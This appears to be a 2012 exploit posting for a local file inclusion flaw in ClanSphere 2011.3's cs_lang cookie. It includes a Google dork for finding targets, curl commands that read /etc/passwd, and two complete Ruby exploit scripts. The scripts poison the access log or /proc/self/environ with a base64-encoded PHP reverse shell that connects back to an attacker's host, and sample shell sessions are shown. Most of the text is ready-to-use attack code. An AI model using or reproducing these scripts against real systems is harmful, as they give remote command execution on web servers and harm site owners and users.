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ClanSphere 2011.3 Local File Inclusion / Remote Code Executi

Posted on 28 October 2012

Exploit Title: ClanSphere 2011.3 (cs_lang cookie parameter) Local File Inclusion Vulnerability Google Dork: "Copyright 2012 Seitentitel. All rights reserved." || inurl:index.php?mod=clansphere Date: 10/24/2012 Author: Marco Tulio ~> blkhtc0rp Vendor Homepage: http://www.csphere.eu Version: 2011.3 Tested on: Centos 5.7, Ubuntu 8.04 and FreeBSD 8 Description: ClanSphere version 2011.3 contains a flaw which allow an attacker to execute commands and code due its cs_lang cookie parameter that is not properly sanitized. Prior versions should also be affected. Poc: curl "http://www.xxx-test.eu/" -b "blah=blah; cs_lang=../../../../../../../../../../../../../../../../etc/passwd%00.png" curl "http://www.xxx-test.eu/" -b "blah=blah; cs_lang=../../../../../../../../../../../../../../../../etc/passwd" curl "http://www.xxx-test.eu/" -b "blah=blah; cs_lang=../../../../../../../../../../../../../../../../etc/passwd%00" Exploit 1: #!/usr/bin/ruby # # ClanSphere 2011.3 (cs_lang cookie parameter) LFI exploit by blkhtc0rp # # # ./clanSphere.rb "" "/var/log/httpd/access_log" 12345 # [x] ClanSphere 2011.3 LFI Exploit # [x] Author: blkhtc0rp # [x] Reverse shell on # # # nc -lp 12345 # pwd # /var/www/html/apps/clansphere_2011.3 # id # uid=48(apache) gid=48(apache) groups=48(apache) # require 'net/http' require 'base64' host = ARGV[0] log = ARGV[1] ip = ARGV[2] rev_port = ARGV[3] abort("Usage: #{$0} <url> <log> <your_ip> <port>") unless ARGV.size == 4 uri = URI.parse(host) cookie = "blah=blah; cs_lang=../../../../../../../../../../../../../../../.." + log + "%00.png" headers = { 'Cookie' => cookie, 'User-Agent' => 'Mozilla/4.0 (PSP (PlayStation Portable); 5.03)' } # Tiny shell from the net lol. shell = "$ip = '#{ip}';$port = #{rev_port}; if (!($sock=fsockopen($ip,$port))) die; while(!feof($sock)){ $command = fgets($sock);$pipe = popen($command,'r'); while (!feof($pipe)) fwrite ($sock, fgets($pipe)); pclose($pipe);}fclose($sock);" enc = Base64.encode64(shell).gsub(" ",'') sh_encoded = "<?php eval(base64_decode(#{enc}));?>" puts "[x] ClanSphere 2011.3 LFI Exploit" puts "[x] Author: blkhtc0rp" puts "[x] Reverse shell on #{ip}:#{rev_port}" # Inject base64 shell req = Net::HTTP::Get.new(sh_encoded) status = Net::HTTP.new(uri.host, uri.port).start do |http| http.request(req) end # Exec shell req2 = Net::HTTP::Get.new(uri.path, headers) status = Net::HTTP.new(uri.host, uri.port).start do |http| http.request(req2) end Exploit 2 /proc/self/environ: #!/usr/bin/ruby # ClanSphere 2011.3 (cs_lang cookie parameter) LFI exploit by blkhtc0rp # Prior versions should also be affected. # # ./clanSphere-poc2.rb "http://victim.com.br/" rhost.com.br 44444 # [x] ClanSphere 2011.3 (cs_lang) LFI exploit # [x] Author: blkhtc0rp # [x] Injecting malicious code into /proc/self/environ... # [x] Launching reverse shell on rhost.com.br:44444... # # nc -vv -l 44444 # Connection from victim.com.br port 44444 [tcp/*] accepted # id # uid=48(apache) gid=48(apache) groups=48(apache) # require 'net/http' require 'base64' url = ARGV[0] proxy = ARGV[1] rhost = ARGV[2] rport = ARGV[3] uri = URI.parse(url) px_addr, px_pt = proxy.split(/:/) if proxy cookie = "blah=blah; cs_lang=../../../../../../../../../../../../../../../../proc/self/environ%00.png" shell = "<?php $ip = '#{rhost}';$port = #{rport}; if (!($sock=fsockopen($ip,$port))) die; while(!feof($sock)){ $command = fgets($sock);$pipe = popen($command,'r'); while (!feof($pipe)) fwrite ($sock, fgets($pipe)); pclose($pipe);}fclose($sock);?>" headers = { 'Cookie' => cookie, 'User-Agent' => shell } puts "[x] ClanSphere 2011.3 (cs_lang) LFI exploit" puts "[x] Author: blkhtc0rp" puts "[x] Injecting malicious code into /proc/self/environ..." puts "[x] Launching reverse shell on #{rhost}:#{rport}..." req = Net::HTTP::Post.new(uri.path, headers) status = Net::HTTP.new(uri.host, uri.port, px_addr, px_pt).start do |http| http.request(req) end